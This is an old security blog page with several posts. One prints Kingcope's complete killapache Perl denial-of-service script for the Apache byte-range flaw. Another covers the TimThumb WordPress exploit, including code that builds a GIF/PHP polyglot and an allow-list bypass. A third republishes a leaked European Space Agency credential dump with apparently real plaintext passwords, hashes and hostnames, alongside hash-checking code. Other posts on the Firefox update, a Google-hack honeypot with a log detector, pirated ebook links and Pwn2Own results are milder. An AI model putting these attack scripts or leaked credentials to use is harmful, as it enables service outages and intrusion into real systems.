Showing posts with label web security. Show all posts

Sunday, 28 August 2011

Killapache: DDOS Tool For Apache Servers




The Apache Software Foundation has announced a denial-of-service vulnerability (CVE-2011-3192) that affects all versions of the ubiquitous Apache HTTP Server, both the 1.3.x and the 2.x branches, leaving up to 65% of all websites (Apache's approximate share of the web at the time) exposed. A flaw in the code that processes byte-range headers allows an Apache 2.2.x server to be crippled from a single PC; the fix shipped in Apache 2.2.20. A Perl script known as "Apache Killer" demonstrates the problem impressively.


Advisory - Click here 


How does the killapache DDOS tool work?
killapache sends HEAD requests whose Range header lists a very large number of byte ranges; the script builds 1300 overlapping ones (bytes=0-,5-0,5-1,...,5-1299). A byte range lets a client fetch only part of a document, for example bytes 500 to 1000. It is normally used while downloading large files: download managers use it to resume interrupted transfers, and it is meant to reduce bandwidth. Vulnerable Apache versions, however, process every requested range separately and buffer each one in memory (and, when the client also sends Accept-Encoding: gzip, mod_deflate compresses each range separately) without rejecting overlapping or unsorted ranges, so a single request can make the server allocate many times the size of the document. Fired from many parallel connections, this exhausts memory and swap until the server becomes unstable.
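As an added example (not part of the original post or of Kingcope's script), the following Python reproduces the Range header killapache sends and shows the check a reverse proxy or WAF would apply to reject it: more than a handful of ranges, or ranges that overlap, run backwards or are out of order. The limit of five mirrors the mod_rewrite workaround in Apache's advisory; extracting the header from the request is assumed to happen elsewhere.

```python
"""Byte-range abuse check for the killapache pattern (added example, not part
of the original post or of Kingcope's script)."""
import re

def killapache_range_header(n_ranges=1300):
    """The exact header value the script sends: "bytes=0-" followed by
    ",5-0,5-1,...,5-1299" (1300 extra ranges that all overlap each other)."""
    return "bytes=0-" + "".join(",5-%d" % k for k in range(n_ranges))

_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")

def parse_ranges(header):
    """Return [(start, end), ...]; start is None for a suffix range ("-500"),
    end is None for an open range ("500-"). Raises ValueError on garbage."""
    if not header.lower().startswith("bytes="):
        raise ValueError("not a byte-range header")
    ranges = []
    for spec in header[len("bytes="):].split(","):
        spec = spec.strip()
        m = _RANGE_SPEC.match(spec)
        if not m or spec == "-":
            raise ValueError("malformed range spec: %r" % spec)
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        ranges.append((start, end))
    return ranges

def is_abusive(header, max_ranges=5):
    """True if the header asks for more than max_ranges pieces, for a range
    that runs backwards, or for ranges that overlap or are unsorted. Five is
    the limit the Apache advisory's mod_rewrite workaround allowed."""
    try:
        ranges = parse_ranges(header)
    except ValueError:
        return True
    if len(ranges) > max_ranges:
        return True
    last_end = -1
    for start, end in ranges:
        if start is None:
            # A suffix range cannot be ordered against the others; only allow it alone.
            if len(ranges) > 1:
                return True
            continue
        if end is not None and start > end:
            return True                      # backwards range such as "5-0"
        if start <= last_end:
            return True                      # overlap, or not ascending
        last_end = end if end is not None else float("inf")
    return False

if __name__ == "__main__":
    print("killapache header flagged:", is_abusive(killapache_range_header()))
    print("resume download flagged:  ", is_abusive("bytes=500-"))
```

Apache's advisory offered the same check as a mod_rewrite rule (RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) followed by RewriteRule .* - [F]), and Apache 2.2.21 later added the MaxRanges directive to enforce a limit in core.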

The code

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;   # not core Perl: install with `cpan Parallel::ForkManager`

sub usage {
        print "Apache Remote Denial of Service (memory exhaustion)\n";
        print "by Kingcope\n";
        print "usage: perl killapache.pl <host> [numforks]\n";
        print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
# Build 1300 overlapping ranges: ",5-0,5-1,...,5-1299". Prefixed with
# "bytes=0-" below, this is the header that makes the server blow up its memory.
$p = "";
for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;   # parent keeps looping; the forked child runs the rest

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

# HEAD is enough: the server still processes every range. Accept-Encoding: gzip
# makes mod_deflate compress each range separately, which costs even more memory.
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {   # drain the response so the server does the full work
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');

# $p is still empty here (killapache builds it later), so this sends a single
# "Range: bytes=0-". It only confirms that the server honours byte ranges at all
# (206 Partial Content); a patched server that still serves ranges passes too.
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;   # status line, e.g. "HTTP/1.1 206 Partial Content"
if ($x =~ /Partial/) {
        print "host seems vuln\n";
        return 1;
} else {
        return 0;
}
}

if ($#ARGV < 0) {
        usage;
        exit;
}

# $#ARGV is the index of the last argument, so "host numforks" gives 1. The
# original compared "> 1" and therefore never used the numforks argument.
if ($#ARGV >= 1) {
        $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
        print "Host does not seem vulnerable\n";
        exit;
}
while(1) {
killapache();
}

Sunday, 14 August 2011

Tim Thumb Wordpress Exploit

A 0-day exploit for TimThumb, the image-resizing script bundled with many WordPress themes, was recently released by MaxE. TimThumb fetches images from remote hosts and caches them locally, in a web-accessible cache directory, without proper sanitisation. The file "timthumb.php" does check whether the fetched file is actually an image, but a file that starts as a valid image and carries PHP code after it passes that check. The script is frequently renamed and ships inside many themes, so a site can be vulnerable without its owner knowing it uses TimThumb at all.

TimThumbCraft – Image Crafting Tool

The easiest way to trick TimThumb into believing that a remotely hosted file carrying PHP code is a real image is to craft the file yourself or to use a tool. TimThumbCraft is a small tool for the job; it also offers a few encoding options, payload types and, of course, options for custom images.
Feature List:

  • List known vulnerable themes
  • Choose between 2 bundled images or select your own
  • Enter your own code or use the reverse PHP shell
  • Encode your PHP payload (applies only when "code" is chosen)
  • Base64 and hexadecimal encoding are currently supported
  • Hexadecimal output of the created file (can be used in pastes, etc.)
  • MD5 calculation of the cache filename the target server will most likely use
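The two checks an attacker has to get past, reconstructed in Python as an added example (this is neither TimThumb's code nor TimThumbCraft): the remote-host allow-list, which compared the allowed site name against the URL as a substring so that a hostname like blogger.com.attacker.example was accepted, and the is-it-an-image check, which a GIF header with PHP appended satisfies. The allowed-site list is reconstructed from the public write-ups and the hardened host check is the fix a reviewer would ask for, not a change TimThumb's authors shipped; the payload is a harmless echo.

```python
"""TimThumb bypass and fix, as an added example (not TimThumb or TimThumbCraft)."""
from urllib.parse import urlparse

# Assumption: default allow-list as reconstructed from the public write-ups.
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com",
                 "wordpress.com", "img.youtube.com"]

def host_allowed_vulnerable(src):
    """Substring match anywhere in the URL: "blogger.com" occurs inside
    "http://blogger.com.attacker.example/shell.php", so it is accepted."""
    src = src.lower()
    return any(site in src for site in ALLOWED_SITES)

def host_allowed_hardened(src):
    """Parse the URL and compare the hostname exactly (or as a subdomain)."""
    host = (urlparse(src).hostname or "").lower()
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)

# 1x1 transparent GIF89a; any magic-byte or getimagesize()-style check sees an image.
_MINIMAL_GIF = (b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"
                + b"\x21\xf9\x04\x01\x00\x00\x00\x00"
                + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
                + b"\x02\x02\x44\x01\x00\x3b")

def craft_gif_polyglot(php_payload=b"<?php echo 'ok'; ?>"):
    """Valid GIF followed by PHP: the image check passes, and PHP emits the
    leading bytes as literal output before running the code."""
    return _MINIMAL_GIF + php_payload

def looks_like_image(data):
    """The kind of magic-byte check TimThumb relied on."""
    return (data[:6] in (b"GIF87a", b"GIF89a")
            or data[:8] == b"\x89PNG\r\n\x1a\n"
            or data[:2] == b"\xff\xd8")

def contains_php(data):
    """What the check should also have looked for before caching with a .php-servable name."""
    return b"<?php" in data or b"<?=" in data

if __name__ == "__main__":
    url = "http://blogger.com.attacker.example/shell.php"
    print("vulnerable check accepts:", host_allowed_vulnerable(url))
    print("hardened check accepts:  ", host_allowed_hardened(url))
    poly = craft_gif_polyglot()
    print("polyglot looks like image:", looks_like_image(poly), "contains PHP:", contains_php(poly))
```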



References:
Proof of Concept: http://www.exploit-db.com/exploits/17602/
TimThumbCraft: Download it here
Demo Video (LQ): http://www.youtube.com/watch?v=udyEOzHK08E
Demo Video (HQ): https://rapidshare.com/files/2016620847/timthumb.avi
Original Info: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Vulnerable Themes: http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html
source: http://www.exploit-db.com/wordpress-timthumb-exploitation/






Saturday, 30 April 2011

Mozilla Firefox 4.0.1: First Security Update



Mozilla has released Firefox 4.0.1, the first security update to its open-source browser.

Fourteen flaws are fixed in Firefox 4.0.1, of which 13 are rated critical and one is rated low impact.

The biggest category of fixed vulnerabilities in Firefox 4.0.1 is memory-safety issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can read Mozilla's advisory here.

The high-impact category of flaws is in WebGL and its related WebGLES graphics library; Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

Unlike the critical memory flaws that Mozilla is patching in this release, the XSLT flaw does not by itself lead to arbitrary code execution. According to Mozilla, an attacker could have used it to trigger memory corruption that makes another attack more reliable.

Firefox 4.0.1 is the first update to Mozilla's browser since Firefox 4 shipped in March. Firefox developers are already working on Firefox 5, which is expected at the end of June.



Friday, 22 April 2011

Detecting Google hacking against your Website

Google and other search engines are used for many purposes: finding useful information, important websites and the latest news on different topics. Google indexes a huge and daily growing number of web pages, and from a security perspective some of those indexed pages contain sensitive information.
Google hacking uses the search engine's advanced operators (inurl:, intitle:, filetype: and the like) to locate specific strings of text within search results. Some of the more popular examples are queries that find specific versions of vulnerable web applications.
GHH is a "Google Hack" Honeypot. It is designed to provide reconnaissance against attackers who use search engines as a hacking tool against your resources: it applies honeypot theory to your web presence by serving pages that match well-known Google-hacking signatures and logging whoever reaches them, adding a layer of detection to your site.
To install the Google Hack Honeypot on your website, follow the install instructions. This lets you monitor attempts by attackers to compromise your security. The logging that GHH implements lets you, the administrator, do what you like with the information: use the attack database to gather statistics on would-be attackers, report activity to the appropriate authorities, and temporarily or permanently deny those sources access to resources.
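The same signal can be pulled out of an ordinary access log without a honeypot: a visitor who arrives from a search-results page whose query used Google-hacking operators is worth a look. The Python below is an added example, not part of GHH; it parses Apache "combined" log lines, extracts the search query from the Referer of Google, Bing or Yahoo results pages, and flags queries that use the advanced operators. The log lines are constructed for the example.

```python
"""Detect search-engine "dork" referrals in access logs (added example, not GHH)."""
import re
from urllib.parse import urlparse, parse_qs

# Apache "combined" log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Operators that mark a query as reconnaissance rather than a normal search.
DORK_OPERATORS = re.compile(
    r'\b(inurl|allinurl|intitle|allintitle|filetype|ext|intext|site):', re.I)

def is_search_host(host):
    return (host.startswith("www.google.")            # google.com, google.co.uk, ...
            or host in ("www.bing.com", "search.yahoo.com"))

def search_query_from_referer(referer):
    """Return the decoded search query if the referer is a results page, else None."""
    u = urlparse(referer)
    host = (u.hostname or "").lower()
    if not is_search_host(host):
        return None
    qs = parse_qs(u.query)          # also decodes %XX and "+" for us
    for key in ("q", "p"):          # Google/Bing use q, Yahoo uses p
        if key in qs:
            return qs[key][0]
    return None

def find_dork_hits(log_lines):
    """Return one dict per request that came from a dork-style search."""
    hits = []
    for line in log_lines:
        m = COMBINED.match(line)
        if not m:
            continue
        query = search_query_from_referer(m.group("referer"))
        if query and DORK_OPERATORS.search(query):
            ops = sorted({op.lower() for op in DORK_OPERATORS.findall(query)})
            hits.append({"ip": m.group("ip"), "request": m.group("req"),
                         "status": int(m.group("status")), "query": query,
                         "operators": ops})
    return hits

# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Apr/2011:10:15:32 +0000] "GET /admin/config.php HTTP/1.1" 200 512 '
    '"http://www.google.com/search?q=inurl%3Aadmin%2Fconfig.php+intitle%3A%22index+of%22" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Apr/2011:10:16:01 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"http://www.google.com/search?q=example+company+news" "Mozilla/5.0"',
    '192.0.2.9 - - [22/Apr/2011:10:17:45 +0000] "GET /backup.sql HTTP/1.1" 404 0 '
    '"http://www.bing.com/search?q=filetype%3Asql+%22insert+into%22+password" "Mozilla/5.0"',
    '192.0.2.10 - - [22/Apr/2011:10:18:00 +0000] "GET /phpinfo.php HTTP/1.1" 200 100 "-" "curl/7.21"',
]

if __name__ == "__main__":
    for hit in find_dork_hits(SAMPLE_LOG):
        print("%(ip)s %(request)s <- %(operators)s : %(query)s" % hit)
```

A 404 on a dorked path (the backup.sql line) is still interesting: it says someone is walking the results of that query against your site, which is exactly the moment a GHH-style decoy page would be found.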

Monday, 18 April 2011

European Space Agency (ESA.INT) Hacked – Full Disclosure


( European Space Agency )
The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
More here.
******************************************************************
(+) Authors : TinKode
(+) WebSite : TinKode27.BayWords.Com
(+) Date : 17.04.2011
(+) Hour : 17:17 PM
(+) Targets : www.esa.int (European Space Agency)
(+) Document: ESA.int Full Disclosure (Hacked)
(+) Method : UnKn0Wn
******************************************************************
Text Files:
  • Main information about the server.  Click here.
  • Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.
Emails:

Preview of Root accounts,  Emails,  FTPs,  etc:
[Root Account]
---------------------------------------------------------------------
Username = root
Password = *8009BCFDDF013C178B831737138F2A3D8E652B8E (SHA1)

[DB Accounts]
---------------------------------------------------------------------
Username = jbossuser
Password = 49c6641168b072d0

Username = psocrat
Password = 49c6641168b072d0

Username = root
Password = 49c6641168b072d0

Username = jbossuser
Password = 7fe05ad56133d52b

Username = psocrat
Password = 7fe05ad56133d52b

[Administrator Account]
---------------------------------------------------------------------
username = rnay06
password = eduxxxr3
admin = y

[Editor account]
---------------------------------------------------------------------
Username = editor
Password = editor2005

[FTP Accounts]
---------------------------------------------------------------------
Password : service2004
Username : nrtservice
Webserver: localhost
Protocol : scp

Username : riverusr
Password : usrriver
WebServer: styx.esrin.esa.it
Protocol : ftp

Username : mapinject
Password : .mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : fire
Username : wfaa
WebServer: twin.esrin.esa.int
Protocol : ftp

Password : MMvomir07.
Username : uvomir
Webserver: 193.204.231.156
More : http://whois.domaintools.com/193.204.231.156
Protocol : sftp

Password : 12qwas
Username : kimv
Webserver: kes.esrin.esa.int
Protocol : ftp

Password : Bk7Wdkf6hY
Username : emathot
Webserver: testlab4.esrin.esa.int
Protocol : ftp

Password : MecoGPOD123
Username : MecoGPOD
Webserver: metheny.esrin.esa.int
Protocol : ftp

Password : brteon
Username : betlem
Webserver: uranus.esrin.esa.it
Protocol : ftp

Password : ch9l
Username : ftpriv
Webserver: uranus.esrin.esa.int
Protocol : ftp

Password : .mapinject
Username : mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp


Password : esa2004
Username : Olivier
Webserver: dummy.server.esa.int
Protocol : ftp

Password : .passWIL
Username : wilkinsa
Webserver: esa-mm.esa.int
Protocol : ftp
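A note on the credential formats in this dump, with an added example that is not part of TinKode's release. The "(SHA1)" label on the root hash is only half right: a 41-character value starting with "*" is the MySQL PASSWORD() format used from MySQL 4.1 onward, which is SHA1(SHA1(password)) in uppercase hex, and the 16-hex-digit values under [DB Accounts] are pre-4.1 OLD_PASSWORD() hashes. Neither format is salted, which is why jbossuser, psocrat and root all show the same value 49c6641168b072d0: they share one password. The Python below classifies a leaked value and reproduces both MySQL algorithms so a candidate password can be checked offline; only the well-known value of PASSWORD('password') is used for verification.

```python
"""Classify and reproduce MySQL credential hashes (added example, not part of the dump)."""
import hashlib
import re

def mysql41_hash(password):
    """MySQL >= 4.1 PASSWORD(): '*' + HEX(SHA1(SHA1(password))), unsalted."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def mysql_old_hash(password):
    """MySQL pre-4.1 OLD_PASSWORD(), the hash_password() routine from sql/password.c.
    Spaces and tabs are skipped by the original; arithmetic is 32-bit unsigned."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in " \t":
            continue
        c = ord(ch)
        nr ^= (((nr & 63) + add) * c) + (nr << 8)
        nr &= 0xFFFFFFFF
        nr2 += (nr2 << 8) ^ nr
        nr2 &= 0xFFFFFFFF
        add += c
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)

def classify(secret):
    """Guess what kind of value a leaked credential field holds."""
    if re.fullmatch(r"\*[0-9A-F]{40}", secret):
        return "mysql-4.1 (SHA1(SHA1(pw)))"
    if re.fullmatch(r"[0-9a-f]{16}", secret):
        return "mysql-old (OLD_PASSWORD)"
    return "plaintext"

def check_candidate(secret, candidate):
    """True if candidate is the password behind secret, whatever its format."""
    kind = classify(secret)
    if kind.startswith("mysql-4.1"):
        return mysql41_hash(candidate) == secret
    if kind.startswith("mysql-old"):
        return mysql_old_hash(candidate) == secret
    return secret == candidate

if __name__ == "__main__":
    # Values as they appear in the dump above.
    for value in ("*8009BCFDDF013C178B831737138F2A3D8E652B8E", "49c6641168b072d0", "editor2005"):
        print(value, "->", classify(value))
    print("PASSWORD('password') =", mysql41_hash("password"))
```

Because neither MySQL format uses a salt, one dictionary pass covers every hash of a given format at once, and identical hash values mean identical passwords across accounts and even across servers.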
The ESA Logs: (screenshots in the original post)
source:tinkode

Thursday, 17 March 2011

Hacking Exposed: Web Applications Ebook 3rd Edition

The latest Web app attacks and countermeasures from world-renowned practitioners. Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, harden against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

  • Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster
  • See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation
  • Understand how attackers defeat commonly used Web authentication technologies
  • See how real-world session attacks leak sensitive data and how to fortify your applications
  • Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques
  • Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments
  • Safely deploy XML, social networking, cloud computing, and Web 2.0 services
  • Defend against RIA, Ajax, UGC, and browser-based, client-side exploits
  • Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures

download: Hacking Exposed: Web Applications Ebook 3rd Edition
FileSonic.com     letitbit.net

Saturday, 12 March 2011

PWN2OWN OVERVIEW & RESULTS

The Zero Day Initiative team is holding its annual Pwn2Own contest on March 9th, 10th and 11th of 2011 in Vancouver. The contest always seems to be an interesting spectacle: seeing how fast certain systems are compromised, learning how companies respond to the vulnerability disclosures, and seeing patches come out up to the very last minute. The targets this year are 4 popular web browsers and 4 mobile devices.

Browsers

This year the web browser targets will be the latest release candidate (at the time of the contest) of the following products:
  • Microsoft Internet Explorer
  • Apple Safari
  • Mozilla Firefox
  • Google Chrome
Each browser will be installed on a 64-bit system running the latest version of either OS X or Windows 7.
A successful hack of IE, Safari, or Firefox will net the competitor a $15,000 USD cash prize, the laptop itself, and 20,000 ZDI reward points which immediately qualifies them for Silver standing. Benefits of ZDI Silver standing include a one-time $5,000 USD cash payment, 15% monetary bonus on all ZDI submissions in 2011, 25% reward point bonus on all ZDI submissions in 2011 and paid travel and registration to attend the DEFCON Conference in Las Vegas.
As for Chrome, the contest will be a two-part one. On day 1, Google will offer $20,000 USD and the CR-48 if a contestant can pop the browser and escape the sandbox using vulnerabilities purely present in Google-written code. If competitors are unsuccessful, on day 2 and 3 the ZDI will offer $10,000 USD for a sandbox escape in non-Google code and Google will offer $10,000 USD for the Chrome bug. Either way, plugins other than the built-in PDF support are out of scope.

Mobile Devices

The following are the target mobile devices for the contest:
  • Dell Venue Pro running Windows Phone 7
  • iPhone 4 running iOS
  • Blackberry Torch 9800 running Blackberry 6 OS
  • Nexus S running Android
As mentioned previously, we’ve upped the ante this time around and the total cash pool allotted for prizes has risen to a whopping $125,000 USD. While HP TippingPoint is funding $105,000 of that, we’ve partnered with Google who has generously offered up $20,000 to the researcher who can best their Chrome browser.
Interestingly, an RF enclosure box will be used for the mobile targets as there seems to be the possibility that


The Results of Pwn2Own 2011

 Browsers

“Safari goes down first at #pwn2own”
“Stephen Fewer @stephenfewer just successfully compromised Internet Explorer (complete with a Protected Mode bypass) at Pwn2Own.”
The vulnerability used against IE8 is not present in IE9, which ships on Monday.
Chrome and Firefox, the other browsers in the contest, went unchallenged.

MOBILE PHONES

The Apple iPhone 4 and RIM's BlackBerry Torch 9800 were both successfully compromised on day 2 of the contest.
The Android and Windows Phone 7 based devices survived the challenge.
It was a vulnerability in WebKit that allowed the BlackBerry to be compromised; Google has responded by patching the flaw in its WebKit-based Chrome browser.

REPORTS


Ars Technica has good write-ups on Day 1 and Day 2 of Pwn2Own 2011. In those write-ups you’ll find a lot more details of the winners and some of the compromises.